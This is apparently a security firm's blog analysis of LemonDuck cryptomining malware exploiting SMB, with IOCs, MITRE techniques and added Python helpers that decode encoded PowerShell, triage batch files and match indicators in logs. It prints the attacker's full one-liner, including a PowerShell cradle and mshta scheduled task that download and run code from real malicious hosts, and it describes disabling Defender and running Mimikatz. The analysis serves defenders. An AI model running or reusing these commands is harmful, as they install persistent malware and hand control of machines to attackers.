LemonDuck Unleashes Cryptomining Attacks Through SMB Service Exploits


This post was authored by Aufa and NetbyteSEC Interns (Irham, Idham, Adnin, Nabiha, Haiqal, Amirul)

This blog post is intended to give an overall picture of how the LemonDuck malware exploited SMB by leveraging the EternalBlue vulnerability (CVE-2017-0144) for cryptocurrency mining, based on observations from our observatory farm. EternalBlue is a significant vulnerability in Microsoft's Server Message Block (SMB) protocol that has been exploited by numerous malware variants. One such strain, LemonDuck, is a well-known cryptomining malware that takes advantage of weaknesses in SMB services to breach networks, disable security measures, and use system resources for cryptomining. It spreads through phishing emails, by exploiting SMB vulnerabilities, and by brute-forcing passwords. Additionally, LemonDuck employs PowerShell to avoid detection, deploy various malicious payloads, and target systems for cryptojacking.

This blog post may be useful for security professionals seeking insight into current malware trends and attack techniques observed in the wild. By the end of it, readers will have a comprehensive understanding of the tactics and techniques used by the LemonDuck operator that compromised users via the SMB domain admin account. Furthermore, security analysts can use the provided Indicators of Compromise (IOCs) associated with this LemonDuck variant to assess whether their environment has been compromised.

Case Summary

The attacker initiated a brute-force attack against the vulnerable SMB service running on our observatory farm, leveraging the EternalBlue (CVE-2017-0144) vulnerability, and successfully compromised the user "Administrator". Upon gaining initial access, the attacker created a hidden administrative share for the C: drive, enabling remote access to the entire drive without the victim's knowledge. The attacker then created a batch file named p.bat, designed to execute a series of malicious actions aimed at gaining persistent control over the system. It first creates and copies the malicious file msInstall.exe, renames it to FdQN.exe, opens specific firewall ports and sets up port forwarding to redirect traffic to a remote address (1.1.1.1) on port 53. The script checks for PowerShell and, if found, runs a Base64-encoded PowerShell script that downloads and executes a script from a remote URL and schedules FdQN.exe to run regularly. If PowerShell is not available, it creates scheduled tasks to run malicious payloads from a remote URL using mshta and executes the malware installed.exe. It also includes an anti-detection mechanism: it monitors the number of open command prompts and forces a system reboot if more than 10 are detected, likely to disrupt analysis or debugging efforts.

Finally, it cleans up by deleting the batch file itself after execution. Additionally, the attacker created another malicious executable disguised as the legitimate system service svchost.exe. This malware was able to disable Windows Defender's real-time protection and create exclusions for the entire C: drive and the PowerShell process to avoid detection. As with the previous script, it manipulates the firewall and sets up port forwarding to redirect traffic to a remote address (1.1.1.1) on port 53, the port commonly used for DNS. It copies and renames the malicious executables (svchost.exe, dig.exe) to (HbxbVCnn.exe, SgcwqM.exe) and sets up scheduled tasks to run these files at regular intervals, ensuring persistence. The script also interacts with other scheduled tasks, deleting and recreating them for continued execution of the malware. This malware attempts to bypass security measures, gain network control, and maintain persistence on the system while executing hidden tasks. At the end of their operation, the attacker deleted the administrative share, either to hide their tracks or to eliminate the administrative share so that they alone retain control of the compromised system.

Figure 1: Graph flow of the attack


Technical Analysis

Brute-force SMB for Initial Access

In the initial access phase, the attacker, with IP address 211.22.131.99, initiated brute-forcing activity against the SMB machine and successfully logged in as a local user named Administrator. The figure below illustrates some of the account names tried during the brute-force attempts.


Figure 2: The attacker with IP 211.22.131.99 carries out a brute-force attack

According to IPThreat, the IP address 211.22.131.99 originates from Taichung City, Taiwan, has been flagged by 5 vendors, and has been reported for "brute force" activity against RDP by Servinformatica and Anonymous on IPThreat, raising concerns about potential malicious behaviour. Hence, we conclude that the IP address is malicious and will continue to attempt brute-force attacks, posing a significant threat to an organization's security.

Figure 3: IP 211.22.131.99 reported as "brute force" activities in IPThreat

Creating a Hidden Administrative Share

Upon logging into the account, the attacker created a hidden administrative share for the C: drive on the local machine. Such a share allows any user with administrative credentials to access the root of the C: drive remotely over the network. For an attacker, a hidden administrative share on the C: drive provides remote access, persistence, and an easier way to evade detection while performing malicious activities.

Figure 4: Hidden administrative share command

Figure 5: The C drive is accessible remotely through SMB service

Exploitation and Persistence

After successfully creating the hidden administrative share, the attacker executed a one-liner command that initiated a series of malicious actions. The figure below shows the command, which appends the string "oEAZjlit" to msInstall.exe in the c:\windows\temp directory. Then the batch file p.bat is created, which copies msInstall.exe to the c:\windows directory under the name FdQN.exe. Another file named eb.txt is created in c:\windows\temp\ containing a single asterisk (*), which may be used as a marker that triggers the next stage of a multi-step attack or process.

Figure 6: A batch file named p.bat is created that copies msInstall.exe and renames it to FdQN.exe

Below is a full command that was executed:
cmd /c echo oEAZjlit >> c:\windows\temp\msInstall.exe&echo copy /y c:\windows\temp\msInstall.exe c:\windows\FdQN.exe>c:/windows/temp/p.bat&echo "*" >c:\windows\temp\eb.txt&echo netsh interface ipv6 install >>c:/windows/temp/p.bat &echo netsh firewall add portopening tcp 65532 DNS2  >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo netsh firewall add portopening tcp 65531 DNSS2  >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo netsh firewall add portopening tcp 65529 DNSS3  >>c:/windows/temp/p.bat&echo netsh interface portproxy add v4tov4 listenport=65529 connectaddress=1.1.1.1 connectport=53 >>c:/windows/temp/p.bat&echo if exist C:/windows/system32/WindowsPowerShell/ (powershell -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAHQALgBhAG0AeQBuAHgALgBjAG8AbQAvAGcAaQBtAC4AagBzAHAAJwApAA==^&schtasks /create /ru system /sc MINUTE /mo 60 /st 07:05:00 /tn NFUBffk /tr "c:\windows\FdQN.exe" /F) else start /b sc start Schedule^&ping localhost^&sc query Schedule^|findstr RUNNING^&^&^(schtasks /delete /TN Autocheck /f^&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.zz3r0.com/page.html?pSVR-ESCWEBAPP"^&schtasks /run /TN Autocheck^&schtasks /delete /TN NFUBffk /f^&schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN NFUBffk /tr "c:\windows\FdQN.exe"^&schtasks /run /TN NFUBffk^&schtasks /delete /TN Autoload /f^&schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autoload /tr "c:\windows\temp\installed.exe"^&schtasks /run /TN Autoload^) >>c:/windows/temp/p.bat&echo net start Ddriver >>c:/windows/temp/p.bat&echo for /f  %%i in ('tasklist ^^^| find /c /i "cmd.exe"'^) do set s=%%i >>c:/windows/temp/p.bat&echo if %s% gtr 10 (shutdown /r) >>c:/windows/temp/p.bat&echo del c:\windows\temp\p.bat>>c:/windows/temp/p.bat&echo c:\windows\temp\installed.exe>>c:/windows/temp/p.bat&cmd.exe /c c:/windows/temp/p.bat&cmd /c c:\windows\temp\installed.exe

The figure below shows all the processes running under p.bat. They include network exploitation setup, script download and execution, scheduled task setup, driver start, and cleanup and final execution.

Figure 7: Process running under batch file p.bat

Network Exploitation Setup
The script starts by installing IPv6, then configures the firewall to open TCP ports 65532, 65531, and 65529 under the rule names DNS2, DNSS2, and DNSS3, respectively. Each port is set up with a port proxy that directs traffic from the local workstation to IP address 1.1.1.1 on port 53, the port commonly used for DNS, disguising the outbound connections as normal network activity. Such network configurations are commonly associated with cryptomining attacks, where the goal is to silently use the machine's processing power for cryptocurrency mining while avoiding detection by security tools.

Figure 8: TCP ports open

Download and Execute Script
The script verifies the presence of PowerShell in the system directory. If PowerShell exists, it uses a Base64-encoded command to download and execute a script from a remote server (http://t.amynx.com/gim.jsp). VirusTotal flags this URL as malicious. Further analysis identified that the URL is associated with cryptomining activity and the LemonDuck malware. The Cisco Talos blog has also shared IOCs related to LemonDuck, one of which is the hostname T[.]AMYNYX[.]COM:
https://blog.talosintelligence.com/lemon-duck-brings-cryptocurrency-miners/ 
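The Base64 blob passed to powershell -e in the one-liner above is UTF-16LE text, so a responder can recover the download cradle without ever running it. The following Python is an added example written for this post (not code from the original analysis or from the malware): it finds the -e / -enc / -EncodedCommand argument in a logged command line, decodes it, and reports which cradle indicators (IEX, Net.WebClient, DownloadString) and URLs it contains. The indicator names and the triage_powershell_cmdline() function are this example's own; the encoded string is the one observed on this page.

```python
import base64
import re

# The encoded argument observed in the p.bat one-liner on this page.
OBSERVED_ENCODED = (
    "SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4A"
    "RABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAHQALgBhAG0AeQBuAHgA"
    "LgBjAG8AbQAvAGcAaQBtAC4AagBzAHAAJwApAA=="
)

# Matches the encoded-command switch and captures the Base64 that follows it.
# Base64 stops at the first non-alphabet character, so a trailing "^&" in an
# echo'd batch line (as in the page's one-liner) does not pollute the capture.
ENC_SWITCH_RE = re.compile(
    r"(?:^|\s)-(?:e|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I
)

# Download-cradle building blocks worth flagging (example's own list).
CRADLE_PATTERNS = {
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "webclient": re.compile(r"Net\.WebClient", re.I),
    "download_string": re.compile(r"DownloadString\s*\(", re.I),
}
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)


def decode_encoded_command(arg: str) -> str:
    """Decode a PowerShell -EncodedCommand value: Base64 over UTF-16LE text."""
    padded = arg + "=" * (-len(arg) % 4)  # tolerate stripped padding
    raw = base64.b64decode(padded)
    return raw.decode("utf-16-le").rstrip("\x00")


def triage_powershell_cmdline(cmdline: str) -> dict:
    """Decode any encoded command in a logged command line and summarise it.

    Returns a dict with the decoded text, the cradle indicators that fired and
    the URLs found; 'encoded' is False when no encoded switch is present.
    """
    m = ENC_SWITCH_RE.search(cmdline)
    if not m:
        return {"encoded": False, "decoded": None, "indicators": [], "urls": []}
    decoded = decode_encoded_command(m.group(1))
    indicators = [name for name, pat in CRADLE_PATTERNS.items() if pat.search(decoded)]
    return {
        "encoded": True,
        "decoded": decoded,
        "indicators": indicators,
        "urls": URL_RE.findall(decoded),
    }


if __name__ == "__main__":
    # Constructed command line in the shape a process-creation log would record.
    result = triage_powershell_cmdline("powershell -e " + OBSERVED_ENCODED)
    print(result["decoded"])
    print("indicators:", result["indicators"], "urls:", result["urls"])
```

The decoded text is the classic one-line cradle: IEX over DownloadString from http://t.amynx.com/gim.jsp. Because the decoder only reads the argument, the same function can be pointed at Sysmon Event ID 1 or Security 4688 command lines in bulk to surface every encoded invocation, not only this one.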

Figure 9: Detection of http://t.amynx.com/gim.jsp in VirusTotal

Figure 10: Detection of http://t.amynx.com/gim.jsp as LemonDuck malware

Setup Scheduled Task
To ensure persistence, the script creates a scheduled task named "NFUBffk", configured to execute "FdQN.exe" every 60 minutes beginning at 07:05 AM, thereby ensuring regular execution of the malware. This executable is associated with the LemonDuck malware and is discussed later.

Figure 11: Scheduled task named NFUBffk configured to execute FdQN.exe

If PowerShell does not exist, the script starts the Windows Schedule service, pings localhost, and then checks whether the Schedule service is running. It deletes the existing Autocheck task and recreates it under the same name, this time using mshta to execute a script from a remote URL (http://w.zz3r0.com/page.html?pSVR-ESCWEBAPP). The newly created Autocheck task is run; the NFUBffk task is then deleted if it exists and recreated to run every 50 minutes, executing FdQN.exe. This ensures that both the Autocheck and NFUBffk tasks are in place and running, allowing the malware to execute at regular intervals and maintain persistence. The script also deletes the existing Autoload task and recreates it to run every 10 minutes, executing installed.exe from the temp folder.

Start the Driver
echo net start Ddriver >> c:/windows/temp/p.bat 
echo for /f %%i in ('tasklist ^^^| find /c /i "cmd.exe"') do set s=%%i >> c:/windows/temp/p.bat 

The script attempts to start a service called Ddriver, then counts the running command prompts (cmd.exe). If more than ten instances are detected, it triggers a system shutdown and reboot. This may be a tactic to evade detection and hinder manual analysis.

Cleanup and Final Execution
echo del c:\windows\temp\p.bat >> c:/windows/temp/p.bat
echo c:\windows\temp\installed.exe >> c:/windows/temp/p.bat

Finally, the script deletes itself (p.bat) and executes installed.exe, so the malicious activity continues without leaving the batch file behind as evidence. This cleanup step helps obscure the attack's origins and reduces the chance of detection.
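The p.bat walkthrough above (network exploitation setup, scheduled tasks, Ddriver and cleanup) maps directly onto a triage routine a responder can run over a recovered batch file or over logged command lines. The following Python is an added example written for this post, not code from the original analysis or from the malware: it takes the p.bat body as reconstructed from the echo lines shown earlier (a constructed sample trimmed to the relevant commands), extracts the netsh portproxy mappings and firewall openings, parses each schtasks /create into its switches, and grades each finding by whether the task runs as SYSTEM, launches remote content via mshta or a URL, or runs from a temp directory. The severity labels, the external-address check and the triage_batch() / parse_switches() helpers are the example's own.

```python
import ipaddress
import re

# Constructed sample: p.bat as reconstructed from the "echo ... >> p.bat" one-liner
# on this page, trimmed to the lines relevant to the triage below.
SAMPLE_PBAT = r"""
copy /y c:\windows\temp\msInstall.exe c:\windows\FdQN.exe
netsh interface ipv6 install
netsh firewall add portopening tcp 65532 DNS2
netsh interface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1 connectport=53
netsh firewall add portopening tcp 65531 DNSS2
netsh interface portproxy add v4tov4 listenport=65531 connectaddress=1.1.1.1 connectport=53
schtasks /create /ru system /sc MINUTE /mo 60 /st 07:05:00 /tn NFUBffk /tr "c:\windows\FdQN.exe" /F
schtasks /create /ru system /sc MINUTE /mo 50 /ST 07:00:00 /TN Autocheck /tr "cmd.exe /c mshta http://w.zz3r0.com/page.html?pSVR-ESCWEBAPP"
schtasks /create /ru system /sc MINUTE /mo 10 /ST 07:00:00 /TN Autoload /tr "c:\windows\temp\installed.exe"
net start Ddriver
del c:\windows\temp\p.bat
"""

KV_RE = re.compile(r"(\w+)=(\S+)")
# A /switch optionally followed by a quoted or unquoted value; a value never
# starts with "/", so "/create /ru" is parsed as two switches, not one.
SWITCH_RE = re.compile(r'/(\w+)(?:\s+("[^"]*"|[^\s/]\S*))?')


def parse_switches(cmd: str) -> dict:
    """Map schtasks-style switches to values: {'create': None, 'ru': 'system', ...}."""
    return {k.lower(): (v.strip('"') if v else None) for k, v in SWITCH_RE.findall(cmd)}


def triage_batch(text: str) -> list:
    """Scan batch lines for the persistence and redirection patterns in this post."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        low = line.lower()
        if not line:
            continue
        if low.startswith("netsh interface portproxy add"):
            kv = {k.lower(): v for k, v in KV_RE.findall(line)}
            addr = kv.get("connectaddress", "")
            try:
                external = not ipaddress.ip_address(addr).is_private
            except ValueError:
                external = True  # hostname or junk: treat as unknown, hence external
            findings.append({"kind": "portproxy", "listen": int(kv.get("listenport", 0)),
                             "target": f"{addr}:{kv.get('connectport', '?')}",
                             "severity": "high" if external else "medium",
                             "reason": "portproxy forwards a local port to a remote host"})
        elif low.startswith("netsh firewall add portopening"):
            parts = line.split()  # netsh firewall add portopening <proto> <port> <name>
            findings.append({"kind": "firewall_open", "port": int(parts[5]), "rule": parts[6],
                             "severity": "medium", "reason": "inbound port opened by script"})
        elif low.startswith("schtasks") and "/create" in low:
            sw = parse_switches(line)
            action = sw.get("tr") or ""
            reasons = []
            if (sw.get("ru") or "").lower() == "system":
                reasons.append("runs as SYSTEM")
            if "mshta" in action.lower() or "http" in action.lower():
                reasons.append("action launches remote content")
            if "\\temp\\" in action.lower():
                reasons.append("action runs from a temp directory")
            if reasons:
                findings.append({"kind": "scheduled_task", "name": sw.get("tn"),
                                 "every_minutes": int(sw.get("mo") or 0), "action": action,
                                 "severity": "high" if len(reasons) > 1 else "medium",
                                 "reason": "; ".join(reasons)})
        elif low.startswith("del ") and low.endswith(".bat"):
            findings.append({"kind": "self_delete", "path": line.split(None, 1)[1],
                             "severity": "medium", "reason": "script deletes a batch file"})
    return findings


if __name__ == "__main__":
    for f in triage_batch(SAMPLE_PBAT):
        print(f["severity"].upper(), f["kind"], {k: v for k, v in f.items() if k not in ("kind", "severity")})
```

On the sample, both port proxies are graded high because 1.1.1.1 is not a private address, Autocheck and Autoload are high (SYSTEM plus mshta/URL or a temp-path action) and NFUBffk is medium on the SYSTEM criterion alone; a real deployment would add its own allow-list of expected tasks before acting on the medium findings.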

Following this sequence, the attacker executed another one-liner command containing several exploitation functions, which is important to highlight. Notably, some commands from the previous execution were repeated.

Figure 12: One-liner command executed that contain a series of malicious activities

Creating and Executing Malicious File
A malicious executable svchost.exe, disguised as a legitimate system process, was created in the "C:\Windows\Temp" directory and executed. It writes a single * character into ipc.txt, acting as a signal or marker that the malware has either completed its current tasks or is ready to proceed with the next stage of the attack. This file-based signalling mechanism is often used by malware to coordinate actions between different components or steps in an attack.

Disabling Windows Defender and Network Configurations
The script then disables Windows Defender real-time monitoring and adds the entire C:\ drive to the exclusion list. Next, it opens TCP port 65529 in the firewall and sets up a port proxy to forward traffic from this port to the external IP 1.1.1.1 on port 53 (DNS). This is likely used for Command and Control (C2) communication, allowing the attacker to control the infected system remotely or exfiltrate data. Disabling Defender is a critical step for the malware, as it prevents security software from scanning files and processes during execution and so helps evade detection.

Moving and Renaming the Malicious File
The malicious file svchost.exe in the "C:\Windows\Temp" directory was copied and renamed to HbxhVCnn.exe within the same directory. At the same time, another executable named dig.exe in "C:\Windows\Temp" was renamed to sgcwqM.exe and moved to the "C:\Windows\" directory. By changing the filenames, the attacker makes it harder for signature-based antivirus software to flag the files, as the new names (HbxhVCnn.exe and sgcwqM.exe) may not be associated with known malware.

Downloading Script and Setting Up Scheduled Tasks 
The script checks whether PowerShell exists. If it does, the attacker executes commands similar to the earlier ones: downloading the script from http://t.amynx.com/gim.jsp and creating multiple scheduled tasks that run every 10 minutes, executing the files HbxhVCnn.exe and sgcwqM.exe.

If PowerShell does not exist, the script runs an alternate set of commands that starts the Windows Task Scheduler service (if it is not already running), pings localhost and checks the running scheduled tasks. It then deletes the existing scheduled tasks named Autocheck and Autostart and replaces them with a new task that runs every 50 minutes. This new task, named Autocheck, uses mshta to execute a script from a malicious URL (http://w.zz3r0.com/page.html?pSVR-ESCWEBAPP), possibly to download more malware or load additional payloads that further compromise the system. This URL was flagged as malicious by VirusTotal. Further analysis revealed that this URL is connected with "http://t.amynx.com/gim.jsp", as shown in Figure 13.

Figure 13: A report that shows relation between w.zz3r0.com and http://t.amynx.com/gim.jsp

The logs also captured the execution of similar commands throughout the entire project, using different task names for persistence, as shown in Figure 14.

Figure 14: List of scheduled tasks with different names

Malware Technical Analysis and Reverse Engineering

Initial Assessment
Two executable files delivered from IP address 211.22.131.99 were found: FdQN.exe (msInstall.exe) and skuAtH.exe (svchost.exe). Based on the VirusTotal result, msInstall.exe has a high detection rate across antivirus signatures, which identify it as a LemonDuck variant.

Figure 15: Report of msInstall.exe in VirusTotal

Script Walkthrough
In this section, our team highlights notable functions found after reversing the executable named msInstall.exe, which has been detected as a LemonDuck variant.

Bruteforce Attack
The function iterates through a list of usernames (userlist) and passwords (passlist), attempting to authenticate with each combination on the targeted IP using the exploit function.

Figure 16: Bruteforce attempt 

userlist() and pslist()
Figure 17: List of credentials of the server

exploit()
The exploit function targets remote systems by exploiting SMB through the EternalBlue (CVE-2017-0144) vulnerability. It identifies the target's OS, escalates privileges to gain SYSTEM-level access, and logs in with the provided credentials before choosing the appropriate exploitation method.

Figure 18: Login and retrieve target OS

Figure 19: Exploitation method

smb_pwn()
From the code in Figure 20, our team identified that it performs the following activities:
  • The smb_send_file() function copies an executable (msInstall.exe) to the C:\windows\temp directory on the remote system; the script then renames the file to FdQn.exe and creates a batch file (p.bat).
  • The batch file contains commands to copy the renamed executable, create scheduled tasks, modify firewall rules, and initiate network communication through the opened ports (65531 and 65532).
  • Scheduled tasks for persistence: several scheduled tasks are created and managed to ensure the malware is executed at regular intervals, such as every 10 or 50 minutes. They point to the FdQn.exe files, including those downloaded from malicious URLs (http://w.zz3r0.com/page.html).
  • Privilege escalation and system monitoring: the script checks whether PowerShell is available on the system. If found, it uses PowerShell to download a remote script from the specified URL (http://t.amynx.com/gim.jsp) and immediately executes it.
  • System service manipulation: the script restarts or manipulates system services such as Ddriver and uses schtasks to run malicious executables on a schedule.
The goal of this process is to maintain control over the target system by making it harder to detect and ensuring persistence through repeated execution.

Figure 20: Code that performs a series of malicious activities

mmka()
At the end of the script there is a function mmka().
Figure 21: Calling Mimikatz function

Upon inspection, the mmka() function actually executes Mimikatz.
Figure 22: Mimikatz code execution

Mimikatz is a powerful post-exploitation tool used to extract and manipulate credentials from Windows systems. It can retrieve plaintext passwords, NTLM hashes, and Kerberos tickets, enabling attacks such as pass-the-hash and pass-the-ticket. The LemonDuck operator might leverage Mimikatz as part of its infection strategy to steal credentials and move laterally across compromised networks.

Conclusion

In conclusion, the LemonDuck malware exploits SMB services by leveraging the EternalBlue (CVE-2017-0144) vulnerability. Upon gaining initial access, the attacker creates malicious batch and executable files that manipulate network settings, set up multiple scheduled tasks to execute the malware, and retrieve malicious code from remote URLs, ensuring persistence on the compromised system. To maintain stealth and evade detection, the attacker disables Windows Defender real-time monitoring, adds the C: drive to the exclusion list, and renames or moves the malicious files within the c:\windows directory. These techniques ensure continuous operation of the malware while attempting to evade detection. Hence, it is crucial for organizations to keep all operating systems and software regularly updated to protect against known vulnerabilities, including EternalBlue (CVE-2017-0144), to minimize the risk of compromise.

Indicator of Compromise (IOC)

Hash
msInstall.exe (MD5: 3ca77a9dfa6188ed9418d03df61fea7a) 

Domain
t.amynx.com (URL: http://t.amynx.com/gim.jsp)
w.zz3r0.com (URL: http://w.zz3r0.com/page.html?pSVR-ESCWEBAPP)

IP Address
211.22.131.99 (Taichung, Taiwan)
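To make the IOC list above directly usable, the following Python is an added example written for this post (not the authors' tooling): it normalizes the hash, domain and IP indicators (including the defanged hxxp / [.] conventions threat reports use, so a domain copied from a report compares equal to a raw DNS log entry), then scans a handful of constructed log lines (a logon event, DNS queries, a file-creation event with its MD5, and a proxy record) and returns which indicator each line matched. The constructed log lines and the refang() / scan_logs() helpers are this example's own; the indicator values are the ones listed on this page.

```python
import re
from urllib.parse import urlparse

# IOCs as listed in this post. The defanged URL form is a constructed input used
# to show that normalization handles report-style defanging.
RAW_IOCS = {
    "md5": ["3ca77a9dfa6188ed9418d03df61fea7a"],
    "domain": ["t.amynx.com", "hxxp://w[.]zz3r0[.]com/page.html?pSVR-ESCWEBAPP"],
    "ip": ["211.22.131.99"],
}

# Constructed sample log lines (not telemetry from the post's observatory farm).
SAMPLE_LOGS = [
    "2024-05-02T07:01:12Z security EventID=4624 LogonType=3 User=Administrator SrcIP=211.22.131.99",
    "2024-05-02T07:05:03Z dns client=10.0.0.15 query=T.AMYNX.COM type=A",
    "2024-05-02T07:05:04Z sysmon EventID=11 Image=C:\\Windows\\Temp\\msInstall.exe MD5=3CA77A9DFA6188ED9418D03DF61FEA7A",
    "2024-05-02T07:06:00Z dns client=10.0.0.15 query=update.microsoft.com type=A",
    "2024-05-02T07:10:00Z proxy client=10.0.0.15 url=hxxp://w[.]zz3r0[.]com/page.html",
]

DEFANG_DOT_RE = re.compile(r"\[\.\]|\(\.\)|\{\.\}")
HXXP_RE = re.compile(r"\bhxxp(s?)://", re.I)


def refang(value: str) -> str:
    """Undo common defanging and lowercase so IOCs and raw telemetry compare equal."""
    v = DEFANG_DOT_RE.sub(".", value.strip())
    v = HXXP_RE.sub(r"http\1://", v)
    v = v.replace("[:]", ":")
    return v.lower()


def build_iocs(raw: dict) -> dict:
    """Normalize IOCs into lowercase sets; a URL contributes its host as a domain IOC."""
    iocs = {"md5": set(), "domain": set(), "ip": set()}
    for kind, values in raw.items():
        for v in values:
            v = refang(v)
            if kind == "domain" and "://" in v:
                v = urlparse(v).hostname or v
            iocs[kind].add(v)
    return iocs


IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
MD5_RE = re.compile(r"\b[0-9a-f]{32}\b")
HOST_RE = re.compile(r"\b[a-z0-9-]+(?:\.[a-z0-9-]+)+\b")


def scan_line(line: str, iocs: dict) -> list:
    """Return (kind, value) for every IOC that appears in one normalized log line."""
    text = refang(line)
    hits = [("ip", ip) for ip in IP_RE.findall(text) if ip in iocs["ip"]]
    hits += [("md5", h) for h in MD5_RE.findall(text) if h in iocs["md5"]]
    hits += [("domain", d) for d in HOST_RE.findall(text) if d in iocs["domain"]]
    return hits


def scan_logs(lines: list, raw: dict = RAW_IOCS) -> dict:
    """Map each matching log line to its IOC hits; lines without hits are omitted."""
    iocs = build_iocs(raw)
    result = {}
    for line in lines:
        hits = scan_line(line, iocs)
        if hits:
            result[line] = hits
    return result


if __name__ == "__main__":
    for line, hits in scan_logs(SAMPLE_LOGS).items():
        print(hits, "<-", line)
```

Matching on the host rather than the full URL is deliberate: the query string (pSVR-ESCWEBAPP) looks like a per-victim or per-campaign tag, so a full-URL match would miss the same infrastructure serving a different path.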

TTP

  • Exploit Public-Facing Application T1190
  • Command and Scripting Interpreter: PowerShell T1059.001
  • Command and Scripting Interpreter: Windows Command Shell T1059.003
  • Valid Accounts T1078.001
  • Scheduled Task/Job T1053.005
  • Impair Defenses: Disable or Modify Tools T1562.001
  • Impair Defenses: Disable or Modify System Firewall T1562.004